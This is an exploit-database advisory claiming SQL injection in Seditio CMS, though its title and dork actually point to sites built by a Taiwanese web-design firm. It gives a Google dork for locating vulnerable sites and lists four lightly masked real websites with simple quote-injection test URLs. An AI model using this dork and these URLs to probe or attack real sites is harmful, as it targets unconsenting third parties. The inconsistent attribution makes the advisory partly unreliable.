Seditio CMS SQL SQL Injection

2015.05.19
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"Design by 沃德網頁設計 - 客製化網頁設計公司\" inurl:\".php?id=\"

[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-] Exploit Title : Design by 沃德網頁設計 - 客製化網頁設計公司 Exploit Author : Ashiyane Digital Security Team Vendor Homepage: http://www.world-d.tw/ Google Dork : intext:"Design by 沃德網頁設計 - 客製化網頁設計公司" inurl:".php?id=" Date : 2015 Tested On : linux Kali + Windows Se7en [-][-][-][-][-][-][-][-][-][-] DESCRITION [-][-][-][-][-][-][-][-][-][-] Seditio CMS SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user. The following URLs and parameters have been confirmed to suffer from SQL injection. [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-] # Poc Of VulnerAbility: # www.all-englishX.com.tw/schools_d.php?id=2;'/ # www.eurotranXexpo.com/about.php?id=3;' # www.cancercXarefoundation.com.tw/news.php?pid=10;' # www.metanXoia-comm.com/tw/about.php?id=3;' [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-] Discovered by : AC3S Special Tnx : 4L1R3Z4 - W.S.S.H - H_SQLI.EMpiRe - Ac!D - Maziar - C4T - EviL ShaDoW [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top